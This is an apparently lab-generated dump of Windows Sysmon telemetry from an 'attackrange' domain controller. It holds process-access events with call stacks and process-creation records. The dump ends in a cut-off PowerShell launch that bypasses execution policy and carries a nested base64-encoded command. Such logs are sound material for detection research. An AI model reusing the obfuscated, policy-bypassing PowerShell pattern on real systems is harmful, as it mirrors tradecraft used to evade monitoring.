13:33:11.043{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.027{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.027{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.037{59A5CD1D-8E17-6005-B902-00000000A201}4616C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8CA6-6005-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:10.965{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:10.965{59A5CD1D-8CA6-6005-0A00-00000000A201}860936C:\Windows\system32\services.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:09.824{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:09.824{59A5CD1D-8CA6-6005-0A00-00000000A201}8601124C:\Windows\system32\services.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:09.801{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8CA6-6005-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{59A5CD1D-8CA6-6005-0A00-00000000A201}860C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local2021-01-18 13:33:11.121Started13.014.50 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.762{59A5CD1D-8E18-6005-BC02-00000000A201}46964448C:\Windows\system32\cmd.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.767{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAz